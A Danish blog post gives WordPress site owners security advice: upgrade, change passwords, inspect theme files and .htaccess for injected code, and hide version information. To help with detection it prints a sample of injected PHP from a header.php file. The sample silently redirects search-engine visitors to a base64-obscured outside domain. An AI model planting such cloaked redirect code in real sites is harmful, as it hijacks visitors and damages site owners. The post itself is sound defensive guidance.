Sikkerhedsfejl i WordPress fører til mange hackede blogs

Sikkerhedsfejl i WordPress fører til mange hackede blogs

Eftersom WordPress bliver mere og mere populært, er blogs drevet af WP mere og mere udsatte for hacker angreb og forsøg på at “hijacke” blogs. Den seneste stykke tid er en lang række blogs blevet overtaget af spammere og hackere, der ikke “overtager” bloggen helt, men lægger skjult kode ind, back-doors, annoncer og specielt links til spam sider.

Selvom WordPress er et af de mest sikre blogging platforme, bliver nye sikkerhedshuller hele tiden fundet (og lappet hurtigst muligt). Husk derfor at altid opdatere med den nyeste version af WordPress.

Hvis du ikke har den seneste udgave af WordPress, 2.5.1, er der stor sandsynlighed for at din side er hacket, selvom alt virker som det skal. Det sker ofte at der er lagt en backdoor ind, så hackeren har adgang til din blog, samt din adgangskode også kendes af hackeren. Vi anbefaler at du:

  • Opgraderer WordPress med det samme
  • Opdaterer din adgangskode

Kig efter skjult kode

Tjek derefter grundigt alle filer i det WordPress tema du bruger, da disse ikke bliver opgraderet. Det er som regel her at skjult kode bliver lagt ind, hovedsageligt med kommandoerne eval() og base64_decode(). Kig efter kode der ser sådan ud, som regel i din header.php:

<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol",
"cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWxc0cy5uZXQ=")."/"); exit; }? >

Hackere bruger kode som denne (mere kode her) for at lægge skjulte links ind på din side, der ikke kan ses af dem der besøger siden, men kun af søgemaskinerne. Tjek derfor alle filer for kode og specielt links der ikke burde være der.

Tjek din .htaccess

Der er også fundet eksempler på at hackere bruger .htaccess til at få adgang til WP-Admin. Åbn din .htaccess fil, som ligger i din WordPress-mappe. Hvis der ikke er ændret noget, skal den se sådan ud:

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [ L]
# END WordPress

Disse linjer kan også være der:

<if module mod_security.c>
<files async-upload.php>
SecFilterEngine Off>
SecFilterScanPOST Off>
</files>
</ifmodule>

Hvis der er andet kode end det du har tilføjet det, er det bedst at du opdaterer alle dine WordPress filer (inklusive .htaccess, selvfølgeligt).

Fjern WP-version fra meta-tags

WordPress blogs bliver automatisk scannet af hackere efter version, på den måde er det nemmere at finde, og hacke, gamle blogs. WordPress bruger en meta tag til at vise hvilken version det er, der ser sådan ud:

<meta content="WordPress <?php bloginfo(’version’); ? />" name="generator" />

Du kan med fordel fjerne denne kode fra din header.php.

Flere tips

  • Begræns adgang tip din wp-admin folder med .htacces, læs hvordan her.
  • Læg en tom index.html fil i din plugins folder, for at skjule hvilke plugins du bruger. Alternativ kan du bruge en index.php fil der viderestiller til din blog, læg < ?php header("Location: http://www.ditdomæne.dk");?> i en index.php fil og upload den.
  • Brug plugins som WP Security Scan for at teste sikkerheden.
  • Og til sidst, brug altid den seneste WordPress version, brug sikre adgangskoder, og husk altid at tage backup

Til sidst kan du læse om blogs der er blevet udsat for hacking, og deres erfaringer. Læs her, her, her, og her.